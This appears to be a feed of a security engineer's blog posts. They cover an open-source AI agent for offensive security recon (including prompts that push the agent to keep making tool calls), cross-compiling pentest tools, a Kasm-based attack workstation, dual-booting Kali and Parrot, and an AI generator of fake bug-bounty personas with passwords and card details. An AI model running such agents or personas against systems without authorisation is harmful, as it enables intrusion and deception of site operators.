Patrick Double | Secure Software Engineering
With extensive experience in software engineering and cybersecurity, I specialize in designing, implementing, and securing software solutions across diverse industries. Explore my work and insights into the latest trends in cybersecurity, DevSecOps, and open-source solutions.

Cyber-AutoAgent-ng (2026-03-20)
https://double16.github.io/l/2026/03/20/cyber-autoagent

The latest open source project I’ve been working on is a fork of the archived Cyber-AutoAgent. It is an offensive security agent with broad reasoning and goals at the top level and pluggable modules specifying narrower targets. My fork is at https://github.com/double16/Cyber-AutoAgent-ng.

(Also keep an eye out for my shyhurricane project. It is my RAG solution for large web apps, but it needs a good agent, so I need the changes discussed here working first.)

My near-term goals for this project:

  • Operationalize it. The original author and contributors did very good proof-of-concept work.
  • Target local small to mid-size models. Not everyone has 💸💸💸💸 and data privacy is a big concern.
  • Large scale recon analysis and reports on web apps, networks, source code, mobile, etc.
  • Check out the GitHub issues for milestones.

Anti-goals:

  • Full exploitation. I find a majority of cycles are spent on exploitation. Once the model tells me the vuln, I can fairly quickly exploit it myself.
  • “Autonomous pentester”. Computers are tools, tools are meant to free humans to do the creative work we excel at and enjoy.
  • Taking over the world. Boring. Owning the world is no good for an introvert, too much input.

Recently I was encouraged to write about my experiences as I go along. It seems like a good idea; looking back, there are conclusions I reached that I wish I had journaled along the way.

My primary machine is a MacBook Pro M1 with 32GB RAM. The results I’ll be writing about are from my laptop (Ollama) or free/cheap models on OpenRouter, NVIDIA NIM, etc. The caveat with the free/cheap models is that your data is likely being used for training or published. Some use cases are ok, such as evaluating intentionally vulnerable apps. The engineering required to get smaller models to produce good results should also make larger models more effective and efficient. (Maybe only 💸💸 instead of 💸💸💸💸.)

If you’re going to ask whether I’ve seen how amazing the frontier models are, and why I am not in love with them, the answer is: yes, I am fully aware of the frontier models. Boring (sort of). Where is the challenge? Where are the bit-twiddling optimizations that make a 14b model get results that matter? Also, where are you all getting all that money that’s making the big corps rich 😂 ??

A lot of the work has been tuning configuration and maintaining an efficient context. There are competing pressures with keeping the context small, yet having enough information for the model to reason.

You’ll see the current version is 0.7.0, which is primarily tool/shell calling improvements. The next milestone is 0.8.0 and it is big :p

The biggest changes are a task system and system prompt optimization. The task system is kept in long term memory and is key to allowing large scale operations. Context memory is not enough, even with frontier models. Along with the task system, system prompts need to change and be optimized.

Task System

The agent creates narrow tasks from tool results which will be used to drive further work. Memory tools serve the agent the next task so the agent doesn’t need the cognitive load of managing tasks.

CAA has had problems with coverage. My tests on JuiceShop and DVWA show a large increase in coverage.

In addition to tasks, the conversation budget code keeps certain messages because they represent state. If they are lost, the model loses its direction:

  • Objective
  • Last plan
  • Active task + evidence paths upon which the task was created

Models

My go-to local model has been qwen3-coder:30b with at least a 40K context window, 49K if my Mac’s unified memory allows. It does less reasoning, issuing tool calls sooner; however, the task system seems to need more reasoning.

Models I’ve found successful after this change:

  • qwen3:30b, qwen3:14b
  • gpt-oss:20b (it tends to stop issuing tool calls after 25-30 steps)

What does not work:

  • qwen3.5:9b, won’t make tool calls consistently, may be the model or small parameter size

Agent Stalling

A problem I’ve been dealing with for a while is the agent stalling, or failing to make progress by issuing tool calls.

For example, with gpt-oss:20b I get this:

**How does this move me toward OBJECTIVE or target coverage?**  
The logout page is part of the DVWA surface; confirming the absence of XSS here ensures coverage of the login/logout flow and validates that no reflected input is processed. This completes the XSS coverage for the logout endpoint.

**Next step:**  
Proceed to the next phase‑1 task: enumerate all endpoints, parameters, and authentication flows. This will provide the necessary coverage for subsequent hypothesis and exploitation phases.

Ok, great gpt-oss, why aren’t you issuing tool calls?

When detecting this case, I’m adding user messages like the following to the conversation:

  • Re-emit your last response as valid tool calls. No prose. No XML. At least one tool call is required to progress towards the objective. Reflect on next steps to reach the objective.
  • **MANDATORY ACTION**: Take your time to decide which tool to call for your next step. This tool MUST be called next to make progress.

Sometimes this works, other times the model refuses to issue tool calls.

The next idea I’m trying is to rebuild the context with the latest plan, memories, and active task. That is working to make progress. I’ve added code to detect duplicate tasks, so we’ll see how it goes.

I’m thinking of trying a sub-agent per task and loading the initial conversation with the plan, task and previews of the evidence relevant to the task. That could be a lot more work and I’m keen to release what I have so far.

System Prompt Optimization

The task system is intended to increase coverage. The system prompt was directed towards reducing steps, a direct conflict. I spent time re-writing prompts to balance coverage and efficiency, de-duplicating instructions, reducing confusion, etc.

The task management prompt seems too large, but the content there is needed to keep the agent rolling. If I try using sub-agents, I’ll also try moving task management into Python code and have the agent only create tasks. The result of the sub-agent would indicate whether the task is done or failed, taking that logic out of the context.

Docker Multiple Platform Builds: Go and Cargo (2026-03-20)
https://double16.github.io/l/2026/03/20/docker-go-cargo-cross-compile

Docker lets you build for multiple platforms (i.e. amd64 and arm64) in the same build process and publish a multi-platform image. Generally this requires an emulator in the Docker build, like QEMU, which isn’t difficult to set up. However, some things will not compile correctly under emulation and are better done by cross compiling. For example: Go and Rust.

Cross compiling works by configuring Docker for a build platform and target architecture. In the build commands, you give the compiler the target architecture.
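For reference, the top-level command that drives such a build lists every target platform in one pass. The image name below is a placeholder, and because the real command needs a buildx builder and registry access, this sketch only assembles and prints it:

```shell
# Placeholder image name; --platform lists every target to build in one pass.
PLATFORMS="linux/amd64,linux/arm64"
IMAGE="ghcr.io/example/tool:latest"
CMD="docker buildx build --platform ${PLATFORMS} -t ${IMAGE} --push ."
echo "${CMD}"
```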

For a full example, see my Kasm Workspace builds:

Go

FROM --platform=$BUILDPLATFORM golang:1.26 AS gobuild
ARG TARGETARCH
ARG BUILDPLATFORM
ENV DEBIAN_FRONTEND=noninteractive
ENV GOOS=linux GOARCH=$TARGETARCH
RUN apt-get update
ADD packages-go.sh /tmp
RUN --mount=type=cache,target=/usr/local/share/go-build-cache --mount=type=cache,target=/usr/local/share/go \
    /tmp/packages-go.sh

The --platform option tells Docker to run this build stage on your native architecture. The ARG TARGETARCH is how Docker tells you which architecture should be built. The values for each differ slightly, though:

--platform:

  • linux/amd64
  • linux/arm64

TARGETARCH:

  • amd64
  • arm64

The names make sense: one is a platform, which includes the architecture; the other is only the architecture. However, when writing your scripts it is easy to get confused.
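The two forms are mechanically related, so one can be derived from the other with a parameter expansion. A minimal sketch, assuming plain linux platforms (variants like linux/arm/v7 would also need TARGETVARIANT handling):

```shell
# Strip the OS prefix from a platform string to get the bare architecture.
TARGETPLATFORM="linux/arm64"
TARGETARCH="${TARGETPLATFORM#linux/}"
echo "${TARGETARCH}"   # arm64
```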

The build script gets messy if you want the build to work on either build platform. For example, if locally you use a Mac with Apple Silicon (arm64), but the build pipeline (GitHub) uses amd64.

If the package needs to compile C (or another language), you need to install the cross-compiler by name.

Go puts native executables in one place and cross-compiled executables elsewhere. That makes sense if you’re building both in the same filesystem, but Docker uses different containers for each, so you need logic to figure out where the binary landed. The script below copies files from "${GOPATH}/bin/linux_${TARGETARCH}" to handle this. I like to add a test to make sure the binary landed where I expected it.

export GOPATH=/usr/local/share/go
export TARGET_DIR=/usr/local/bin
mkdir -p "${TARGET_DIR}"
if [ "$BUILDPLATFORM" = "linux/$TARGETARCH" ]; then
  export GOBIN="${TARGET_DIR}"
fi
export GOCACHE=/usr/local/share/go-build-cache
export GOFLAGS="-ldflags=-s -w"
export CGO_ENABLED=1

# setup for modules that need to compile C code
export CC=gcc CXX=g++
C_PACKAGES="build-essential pkg-config git ca-certificates"
if [ "$(arch)" = "arm64" ] || [ "$(arch)" = "aarch64" ]; then
  C_PACKAGES="${C_PACKAGES} gcc-x86-64-linux-gnu g++-x86-64-linux-gnu libc6-dev-amd64-cross"
  if [ "$GOARCH" = "amd64" ]; then
    export CC=x86_64-linux-gnu-gcc CXX=x86_64-linux-gnu-g++
  fi
elif [ "$(arch)" = "x86_64" ]; then
  # note: `arch` prints x86_64 on amd64 hosts, not amd64
  C_PACKAGES="${C_PACKAGES} gcc-aarch64-linux-gnu g++-aarch64-linux-gnu libc6-dev-arm64-cross"
  if [ "$GOARCH" = "arm64" ]; then
    export CC=aarch64-linux-gnu-gcc CXX=aarch64-linux-gnu-g++
  fi
fi
apt-get install -y --no-install-recommends ${C_PACKAGES}

go install github.com/projectdiscovery/katana/cmd/katana@latest

if [ -d "${GOPATH}/bin/linux_${TARGETARCH}" ]; then
  find "${GOPATH}/bin/linux_${TARGETARCH}" -type f -print -exec cp {} "${TARGET_DIR}" \;
fi

test -x ${TARGET_DIR}/katana

Rust

Rust has similar complications. They were enough that I created a Docker image with an ONBUILD handler to deal with them. See https://github.com/double16/cargobuild.

FROM --platform=$BUILDPLATFORM ghcr.io/double16/cargobuild:latest AS cargobuild
ADD packages-cargo.sh /tmp
RUN --mount=type=cache,target=/usr/local/share/cargo \
    /tmp/packages-cargo.sh

The contents of packages-cargo.sh:

# Get target specific vars, from the cargobuild image
if [[ -f "/etc/environment" ]]; then
  . /etc/environment
fi
# Setup the cargo environment, from the cargobuild image
if [[ -f "${HOME}/.cargo/env" ]]; then
  . "${HOME}/.cargo/env"
else
  export CARGO_HOME=/usr/local/share/cargo
fi
for CARGO in rustscan feroxbuster; do
  cargo install --root /usr/local ${TARGET:+--target ${TARGET}} "${CARGO}"
done

Moving Targets

As versions of Go and Rust are released, sometimes how cross compiling is handled breaks. I use my pentest-tools repo regularly. Check the files I referenced at the beginning for the latest working script-fu.

BloodHound Ephemeral Docker Container (2026-03-06)
https://double16.github.io/l/2026/03/06/bloodhound-kasm-image

If you use BloodHound, I maintain an ephemeral docker image that runs with Kasm or standalone. (I enjoy Kasm for many reasons; check it out sometime.) It has a quicker start-up time because I let the database initialize at build time rather than runtime.

The ephemeral nature works great for CTFs or short engagements.

Disclaimer: This is meant for ephemeral, local use only.

https://gallery.ecr.aws/bramblethorn/kasm/bloodhound

Wild West Hackin’ Fest 2026 - Denver (2026-02-17)
https://double16.github.io/l/2026/02/17/wwhf-denver

I was accepted for my first conference talk at Wild West Hackin’ Fest in Denver, CO!

The topic was “Attacking AI Video Processing.” I’ll post a link to the video when it is available. There are a related blog post and GitHub repo as well.

WWHF was a great time! I like smaller conferences. (DefCon is too big for me.) The talks are practical and interesting. Everyone is friendly: BHIS staff, attendees, vendors.

I went to WWHF Deadwood in October 2024. It was my first security conference. As I’d done at previous developer conferences, I tried to attend all the interesting talks. I left feeling like I missed something: I didn’t get to know more people.

This time I decided to make an effort to skip some talks and talk to people. I’m glad I did! I had some great conversations, even with some popular people in the industry (IppSec and Jason Haddix). Although there were great talks, the people were the best part.

My talk went well. Thanks go to my manager and colleagues for coaching! Some insightful questions afterwards, so people were interested :) When I have something useful to share, I will submit again.

Thanks BHIS! You are fostering a great community.

Kasm Workspaces Offensive Toolset (2025-02-01)
https://double16.github.io/l/2025/02/01/kasm-workspaces

TL;DR: I am currently using Kasm Workspaces, a containerized solution, for my offensive security toolset. It solves a lot of problems for me. My GitHub repo has an Ansible playbook that installs it to 99% of what I need. Others should be able to use it with little customization.

VMs are nice, but …

I really like virtualization and automation. IYKYK. I don’t want my host cluttered with tools and config I forgot about, or a major upgrade left cruft around. Then there’s the config change necessary for a CTF that breaks other stuff, but I find out it’s broken weeks later and I don’t know what I changed. There’s always the searching to tweak things to get it just right. Now, on another host, I have to go back through the search because I forgot what I did. A VM is mostly isolated, so code gone wrong has a smaller blast radius.

Virtualization brings some challenges too. Disk space usage can get high. For assessment isolation it’s best to take a snapshot of the “clean” install and then revert. I also take a snapshot before a major upgrade. So I’ve got a snapshot of the base install, followed by an upgrade, followed by an assessment. What if I want to work on a CTF? Stop the machine with the bug bounty work, start from a base snapshot for the CTF. How do I run both? Clone the VM, which is a lot of disk space and time. Linked clone? Ok, well, that’s another layer of effective snapshots. I typically get to the point where I cannot remove old snapshots because I don’t have the disk space. Delete it all, start over.

Containers are nicer

I’ve used a containerized development environment before. If I can get containers running, my environment is ready to go. Most clients will allow some form of docker: Docker for Desktop, podman, docker.io on Linux or WSL, etc. How about my security toolset?

Kasm

I stumbled across Kasm Workspaces recently. It is a Desktop-as-a-Service solution running on containers. It uses Apache Guacamole to access the desktop in a browser. It scales from a single install to a multi-server solution. This post describes what problems I wanted to solve and how I solved them. I use it as a single-server install on my laptop with the intent of only accessing it from my laptop. (It can be configured to allow connections from other machines.)

Software is stored in a container image that includes a desktop component. Kasm provides many such “workspaces”. Some are based on Ubuntu, Kali or Parrot OS. A workspace can be extended by basing a new image on an existing one. Kasm has good documentation for this.

What am I solving for?

During my penetration testing journey, I’ve found the following things I want to solve:

  1. Automate tool installation and configuration
  2. Common resources such as wordlists, shells, etc.
  3. Isolation from the host
  4. Isolation between engagements: client, bug bounty, CTF
  5. Ability to run engagements concurrently
  6. Ephemeral: How painful is it to reinstall?
  7. Persistent storage of artifacts

Architecture

Simply put: I found I’m better off putting Kasm in a VM. A VM is necessary on Mac or Windows. On Linux, Kasm can be installed on the host and it’s more efficient, but be careful what kind of host. If it’s a managed host, I recommend using a VM anyway; if virt-manager is an option, it’s going to be very efficient regardless. EDR networking can mess with the container networking, and it’s ugly.

Automate tool installation and configuration

I automate everything I can. If I do something twice, I ask myself why I didn’t automate it. The dev world is full of automation: CI/CD pipelines, infrastructure-as-code (Terraform, CDK, …), deployment. I don’t like repetitive tasks. I don’t like forgetting how I configured something and figuring it out again. I don’t want to write a playbook of instructions to repeat by hand. Write a script or something.

I have automated the Kasm install and configuration almost entirely. I’m using Ansible for the reasons one uses Ansible. The playbook is at https://github.com/double16/pentest-tools/tree/master/attackhost. Major things it does:

  1. Install docker
  2. Configure networking
  3. Mount directories shared from the host
  4. Clone git repos with fun tools into /opt
  5. Clone wordlists into /opt
  6. Install and configure Kasm
  7. Add workspace registries to make it easy to install workspaces
  8. Configure installed workspaces with the persistent profile (if the S3 bucket is configured)

Networking: Kasm can run on multiple servers, so the different services need a way to talk to each other. It will use the laptop hostname, which will resolve to (usually) a DHCP assigned IP address. That IP address is stored and used in Kasm. When the laptop receives a new address, Kasm breaks. The networking tasks assign a local address and modify Kasm’s compose config to use it for the hostname.

Kasm has workspace registries to make it easy to find and install workspaces. The attackhost/vars/workspace_registries.yml file contains a list of registries. Mine is in there.

I have a Kasm Workspace Registry with workspaces tailored to my liking: Kali and ParrotOS extended with packages, Burp Suite Pro and CE from PortSwigger, ZAP Weekly, Postman, Caido, Obsidian, and JetBrains IDEA. Read the dockerfiles for a full list.

BloodHound is a special one. I found the docker compose version of BloodHound slow to install. The workspace image has it pre-installed up to the point of changing the password. It’s ephemeral, so there isn’t cruft from previous uses.

Common resources such as wordlists, shells, etc.

Wordlists can be huge. Repos with tool source, like shells, can be huge. I avoid duplicating those in the Kali and Parrot images by putting them into /opt/wordlists and /opt/src. Kasm is configured to map them into all containers. These things can also be updated without requiring a new container image to be built.

Isolation from the host

It’s important to me to keep the host clean from tools and config. Using a VM does that by design. The host needs a virtualizer, such as VMware Workstation, VMware Fusion, VirtualBox, virt-manager, whatever. If a bare-metal install is used, containerization also isolates the host by design. It’s a little less isolated because Kasm adds a service account for the database and a few other minor things.

Isolation between engagements: client, bug bounty, CTF

It’s imperative that engagements don’t mix artifacts with each other: scan results, exploits, and especially secrets, which would be very bad. I treat CTFs like an engagement; it forms good habits. How does the workflow support isolation?

Create a Kasm user for each engagement. The configuration that mounts volumes such as the wordlists applies to all users, so no per-user configuration is needed. The usefulness of this is described further below.

Persistent profiles store the home directory of the container into an S3 bucket when the workspace is removed. When the workspace is created, the profile is restored. This helps keep configuration in place. There are options to disable this feature or reset the profile when creating the workspace.

The profile is specified using a template that allows an image and/or user to be specified in the path. It looks like s3://my-bucket-name/profiles/{username}/{image_id}/. The profile is scoped per user, per image. Per user equates to per engagement; per image is needed because the different software in each container image may conflict.

Ability to run engagements concurrently

Containerization is designed for multiple containers to run using the same image. Disk space is used efficiently. Upgrades to an image can happen while allowing existing containers to continue. Kasm will automatically remove older images that aren’t in use any longer.

Using the user-per-engagement approach, multiple logins can be used with private browser windows. Logging out of a user doesn’t stop the workspace, so switching users is also an option.

Ephemeral: How painful is it to reinstall?

VMs crash. Kasm will get out of sorts sometimes from the laptop sleeping or hard poweroff. Things happen.

How painful is it? See the install section below for the steps, but my experience is 20-30 minutes for reinstall, 30 more minutes to download the images depending on network bandwidth. Not bad. I don’t have to do it often. :)

Persistent storage of artifacts

Considering the Kasm install ephemeral raises the question: what about artifacts? My setup has two options.

The playbook will mount volumes shared from the host. Reinstalling Kasm won’t lose the host files, and they will be available in the new install. For isolation, any shared directory whose name contains the word share will be configured with a subdirectory per user name, and only that subdirectory is mounted, so the workspace container does not have access to the other users’ directories.
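A sketch of that convention; the paths and user name here are illustrative, not the playbook’s actual values:

```shell
# Each Kasm user (engagement) gets its own subdirectory under the share;
# only that subdirectory is mounted into the user's workspaces.
SHARE_ROOT="$(mktemp -d)/user_share"
KASM_USER="engagement1"
mkdir -p "${SHARE_ROOT}/${KASM_USER}"
ls "${SHARE_ROOT}"
```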

Kasm supports cloud storage providers. S3 is what I configure. It requires a bucket name, access key and secret. The others are more difficult when using OAuth because the laptop doesn’t have a good way to receive callbacks, etc.

The S3 integration uses rclone to mount the bucket at /s3. It works fairly well. There are some filesystem consistency issues, but I haven’t lost data; see the rclone docs for details. The S3 volume doesn’t support specifying paths like the persistent profiles do, so an S3 bucket doesn’t isolate engagements as nicely as the host shares.

There is a /mnt/user_share directory that is mounted to the VM at /home/kasm_user_share. It has subdirectories for each Kasm user (engagement). Don’t use it for stuff that is important long term, or at least do a good job of keeping the VM healthy.

Install

I’m assuming the reader understands how to install a VM and configure the OS.

I recommend the VM have at least 120GB of disk space. 200GB is better. The disk usage is stable, it doesn’t grow much over time. Most of the space is the container images which are automatically cleaned by Kasm. Workspaces with lots of data stored outside of the volume mounts (shared folders, S3) will take up space but will be cleaned on removal.

I set memory to 2/3 of system memory, and cores to half of the total. YMMV.

For VMWare there is a script in the repo new-vm-vmware.sh that will create a new VM, auto-provision Ubuntu, and use btrfs with compression. Filesystem compression helps noticeably for the container images. The script will create a new SSH key, configure it in the VM, then configure a .hosts.ini file for use with Ansible.

The install requires some files ignored by git that are specific to the install. The playbook will create examples if they aren’t found, except for .hosts.ini.

file                              purpose
attackhost/.hosts.ini             Ansible hosts config
vars/.networking-{hostname}.yml   Settings for a local network to survive DHCP IP address changes
vars/.credentials.yml             Credentials for Kasm, S3, etc. to remain stable across re-installs

The command for running the playbook follows.

$ cd pentest-tools/attackhost

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# ansible will stop, requesting that the configuration in `vars/.credentials.yml` be updated

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# kasm is installed, login as [email protected] and install the desired workspaces

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# now the installed workspaces will have persistent profiles configured

.hosts.ini

The repo has an example hosts.ini. Ignore [kasm_build] and [kasm_agents]. [kasm_build] is for the image build VM, which has specific requirements for multi-platform builds; it’s not needed for use. [kasm_agents] is a work in progress that may never be finished.

The IP address is that of the VM used for ssh.

[kasm_server]
192.168.1.100 ansible_user=your_username ansible_ssh_private_key_file=~/.ssh/id_kasm

# 127.0.0.1 ansible_connection=local

vars/.networking-{hostname}.yml

This file is automatically generated. There shouldn’t be a need to modify it.

kasm_server_ip: "169.254.213.100"

vars/.credentials.yml

The generated file will contain values that the playbook populates. The [email protected] user and admin_password are used for administration. The user_password is used for user logins. The other passwords and tokens are used internally.

storage_key, storage_secret and storage_bucket are the S3 config that is used for both persistent profiles and the S3 volume mount. If S3 isn’t desired, replace CHANGEME with empty strings.

kasm_users isn’t required, but can be used for users to provision by automation. The default user group is configured so that each user doesn’t require specific configuration.

admin_password: "generated"
user_password: "generated"
manager_token: "generated"
database_password: "generated"
redis_password: "generated"
registration_token: "generated"
storage_key: "CHANGEME"
storage_secret: "CHANGEME"
storage_bucket: "CHANGEME" 
kasm_users: "test,engagement1,engagement2,ctf1,ctf2"

User Experience

What is the workflow like?

The responsiveness is really good. IMHO it feels like typing in a terminal on the host.

Kasm has a control panel that can be expanded. “Workspaces” will minimize the current workspace and allow others to be launched. “Delete Session” will destroy it, saving the persistent profile.

The Kasm docs are very good. Read through them to understand other features.

Reinstalling

Ansible can be used to uninstall and reinstall Kasm if the VM is ok, but Kasm is broken in some way.

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm-uninstall.yaml
# kasm is uninstalled, containers may need to be forcibly removed in the VM

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# kasm is installed, login as [email protected] and install the desired workspaces

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# now the installed workspaces will have persistent profiles configured

Warnings

Kasm is Desktop-as-a-Service

This means it is primarily intended to allow connections from other computers to run desktops. Only port 443 is needed. Bind it to the loopback device, or block it with the firewall. Be careful with EDR and running afoul of policies. Running in a VM with NAT networking and forwarding port 443 only on loopback will help.

Kasm touches users and docker

Kasm adds a service account for the database. It installs some plugins into docker. There are some packages it needs. If these modifications will trigger the EDR, best to use a VM that may lessen the issue.

Lock-down Profile Storage

Persistent profiles will very likely have sensitive data such as secrets. Secure the S3 bucket, or don’t use persistent profiles.

An example bucket policy is in the repo at attackhost/kasm-s3-storage-policy.json.

Dual Booting Kali and Parrot (2024-09-17)
https://double16.github.io/l/2024/09/17/dual-boot-kali-parrot

I recently acquired two monitors that came with a laptop. I decided to use the laptop as a disposable attack machine, disposable in the sense that I can re-image it without data loss. Now, Kali or Parrot OS? I’ve been using the HackTheBox pwnbox, which is Parrot, for a bit. How about both!

The GRUB boot loader has nicely supported multiple operating systems for some time. The Linux Volume Manager (LVM) allows flexible partitioning and resizing without using something like gparted. The key takeaways are:

  1. Create a LVM volume for each OS
  2. Create a LVM volume for /home to share
  3. Create the same user on each OS to make the /home/ share work well

I’ll be able to boot into either OS, upgrade them independently, and keep my data in /home.

The post assumes you know something of installing Linux and what partitions and LVM are. If not, there is a lot of information on this already.

Create USB Media

I’m booting live images from USB drives. Download the ISO of the desktop versions of Kali and Parrot, then write each to a USB drive using the following command. sudo dd is dangerous: make sure you get the devices correct or you could wipe out your hard drive.

$ sudo dd if=kali-or-parrot.iso of=/dev/usb bs=1M

The versions I used for this post:

Install Kali Linux

First, install Kali Linux. This is important. It has a guided mode for partitioning with LVM using a separate /home volume. Parrot did not, and I had trouble using the manual mode with LVM.

I chose “Graphical Install”.

Go through the install making the choices you’d like. When you get to the user name dialog, use the same user name on both Kali and Parrot. They are both Debian based, so the UID and GID will be 1000 on both operating systems. This will make the shared /home work seamlessly.

Partition with LVM

When you get to the following screen, pick either of the “set up LVM” options.

Choose the “Separate /home partition” option. Don’t try to share /var. Sharing /tmp might be ok, but I didn’t test it; you won’t gain much.

This is very important: reduce the amount of disk space used for the Kali install. This controls the total amount of space used by the logical volumes, so there will be space for the Parrot OS install. LVM allows increasing space later without re-partitioning. The home volume will automatically get the majority of the space. Leave at least 60GB for Parrot if you can spare it.

Finish the Kali install with whatever options you like.

Install Parrot OS

Boot into the Parrot OS USB. If your machine’s UEFI BIOS doesn’t allow you to get into it with a keypress, choose the “UEFI Firmware Settings” selection from the Kali boot screen.

Select the “Try / Install” options.

Run “Install Parrot”.

Manual Partitioning

When you get to the “Partitions” section, choose “Manual partitioning”.

Edit the “/dev/kali-vg/home” volume to set the mount point to /home.

Create a new volume by selecting “Free Space” and “Create”. This is the free space left during the Kali install.

The default for Parrot 6.1 is “btrfs”, leave it. The LVM LV name should be recognizable to you as the Parrot root partition, i.e. “parrot”. The mount point must be “/”.

Change the storage device from the volume group to the device.

Edit the “FAT32” partition to be mounted at “/boot/efi”. This is where Parrot will put the kernel and boot info.

Make the username the same as the Kali install.

Finish the install.

Grub Changes

At the time of this writing, the Kali grub configuration does not find Parrot. This can be fixed by modifying /etc/grub.d/40_custom with the following content:

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries.  Simply type the
# menu entries you want to add after this comment.  Be careful not to change
# the 'exec tail' line above.

menuentry "Parrot" {
    chainloader (hd0,gpt1)/EFI/Parrot/grubx64.efi
}

This will add an entry to the boot menu labeled Parrot. Choosing this will open the Parrot boot menu.

(hd0,gpt1) will need to match the EFI partition. hd0 refers to the drive in the order GRUB enumerates them, and gpt1 is the partition number. For example:

$ mount | grep /boot/efi
/dev/sda1 on /boot/efi type vfat (...)

For /dev/sda1, the a shows this is the first disk and the 1 is the partition number. (NVMe devices use a different naming scheme, e.g. /dev/nvme0n1p1.) Generally, when installing on bare metal, (hd0,gpt1) will be the values you want.
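
Rather than mapping the device name by hand, GRUB can report the value itself. A sketch run from the installed Kali system (grub-probe ships with the grub packages):

```shell
# Ask GRUB which device name backs the EFI mount.
# The output is the value to use in the menuentry, e.g. (hd0,gpt1).
sudo grub-probe --target=drive /boot/efi
```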

One final change I recommend when installing multiple operating systems is to disable the automatic boot. Otherwise, you’ll power up your machine, grab your coffee, and too late! You need to reboot now. :p

This change needs to be made on both Kali and Parrot because update-grub will be run when either has a kernel upgrade.

/etc/default/grub:
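
The change is the timeout setting. A minimal excerpt, assuming the stock file layout; per the GRUB manual, a timeout of -1 waits at the menu indefinitely:

```shell
# /etc/default/grub (excerpt)
# -1 disables automatic boot; grub waits for a selection.
GRUB_TIMEOUT=-1
GRUB_TIMEOUT_STYLE=menu
```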

Apply the changes:

$ sudo update-grub
Generating grub configuration file ...
Found background image: /usr/share/images/desktop-base/desktop-grub.png
Found linux image: /boot/vmlinuz-6.5.0-13parrot1-amd64
Found initrd image: /boot/initrd.img-6.5.0-13parrot1-amd64
Warning: os-prober will be executed to detect other bootable partitions.
Its output will be used to detect bootable binaries on them and create new boot entries.
Found Kali GNU/Linux Rolling on /dev/mapper/kali--vg-root
Adding boot menu entry for UEFI Firmware Settings ...
done

Dual Boot

Rebooting shows entries for Parrot and Kali!

Snapshots

I recommend looking into LVM snapshots. This can save you in case of a bad OS update or you happen to run something malicious. There are a few packages: timeshift, snapper and autosnapshot. I’m going to give timeshift a try first because it has a GUI with snapshot restore. It will be interesting to see how installs on both Kali and Parrot operate.
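
If you want to see what those packages automate, the underlying LVM commands are simple. A hand-run sketch assuming the kali-vg volume group from this install; the LV name and size here are examples, so check lvs for your actual names and free space:

```shell
# Take a snapshot of the Kali root LV before an upgrade.
sudo lvcreate --snapshot --name root-pre-upgrade --size 10G /dev/kali-vg/root

# If the upgrade goes badly, merge the snapshot back into the origin.
# With the origin in use, the merge completes on the next activation
# (e.g. after a reboot).
sudo lvconvert --merge /dev/kali-vg/root-pre-upgrade

# If all is well, drop the snapshot to reclaim the space.
sudo lvremove /dev/kali-vg/root-pre-upgrade
```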

]]>
Creating Personas using AI2024-09-12T00:00:00+00:002024-09-12T00:00:00+00:00https://double16.github.io/l/2024/09/12/fabric-patterns-create-personaWhen working bug bounties, you’re going to create users. Some of the profile information can take a minute to think up, at least for me. Now, I’ve created an AI bot to create personas for me and they are pretty good. I get a name, billing and shipping address, username, password, fake credit card, personal interests, bio, tag lines, a resume and more.

The code is available in my GitHub at https://github.com/double16/fabric, the create_persona pattern. The pattern is used with fabric, or you can paste the code into the OpenAI AI Assistant.

This pattern requires no input. It will create a persona in a randomly chosen large city. Any input given will influence the results, such as city, personal interests, and the domain name or URL of the target web site. The output is markdown so it will work with a variety of text editors.

St. Louis, MO

$ echo "St. Louis, MO" | fabric --pattern create_persona

Note that the avatar pictures have been redacted. It will pull pictures of real people and I don’t want to post those here.

Persona Details

  • Name: Sarah Thompson
  • Gender: Female
  • Date of Birth: August 15, 1985
  • Age: 38
  • Billing Address:
    • 4567 Pine Street
    • St. Louis, MO 63108
  • Shipping Address:
    • 4567 Pine Street
    • St. Louis, MO 63108
  • Phone Number: (314) 555-8392
  • Email: [email protected]
  • Password: Th0mP$0n!2023
  • Username: bluebird85
  • Payment Card:
    • Card Type: Visa
    • Card Number: 4111 1111 1111 1111
    • Expiration Date: 08/26
    • CCV: 456
  • Security Questions:
    • Question 1: What is the name of your first pet?
      • Answer: Max
    • Question 2: What is your mother’s maiden name?
      • Answer: Johnson
    • Question 3: What was the name of your elementary school?
      • Answer: Lincoln Elementary
  • City of Birth: Kansas City, MO
  • Cities Lived:
    • Kansas City, MO (1985-2003)
    • Columbia, MO (2003-2007)
    • St. Louis, MO (2007-Present)
  • Education History:
    • High School: Central High School, Kansas City, MO (Graduated 2003)
    • Bachelor’s Degree: University of Missouri, Columbia, MO (Bachelor of Science in Business Administration, Graduated 2007)
  • Job Title: Marketing Manager
  • Company: Gateway Marketing Solutions
  • Work Location: St. Louis, MO
  • Personal Interests:
    • Cooking
    • Hiking
    • Photography
    • Movies
  • Personal Bio:
    • Hey, I’m Sarah! Born and raised in Missouri, I’ve been living in St. Louis for the past 16 years. I work as a Marketing Manager and love to spend my weekends hiking and capturing the beauty of nature through photography. Big fan of cooking up new recipes and chilling with a good movie.
  • Tag Line:
    • Always chasing the next adventure and a great photo!
  • Avatar Pictures:
    • redacted

      Professional Resume

Sarah Thompson

Contact Information

  • Address: 4567 Pine Street, St. Louis, MO 63108
  • Phone: (314) 555-8392
  • Email: [email protected]

Summary

Experienced Marketing Manager with a demonstrated history of working in the marketing and advertising industry. Skilled in digital marketing, campaign management, and creative strategy. Passionate about hiking, photography, and culinary arts.

Education

  • University of Missouri, Columbia, MO
    • Bachelor of Science in Business Administration
    • Graduated: 2007

Professional Experience

  • Gateway Marketing Solutions, St. Louis, MO
    • Marketing Manager (2015 - Present)
      • Lead and manage a team of 10 marketing professionals.
      • Develop and execute marketing strategies to increase brand awareness and drive sales.
      • Analyze market trends and competitor activities to identify opportunities for growth.
      • Oversee digital marketing campaigns, including social media, email marketing, and SEO.
  • Creative Edge Marketing, St. Louis, MO
    • Marketing Specialist (2007 - 2015)
      • Assisted in the development and implementation of marketing campaigns.
      • Conducted market research and analysis to support strategic planning.
      • Collaborated with the design team to create promotional materials.

Skills

  • Digital Marketing
  • Campaign Management
  • Creative Strategy
  • Market Analysis
  • Team Leadership
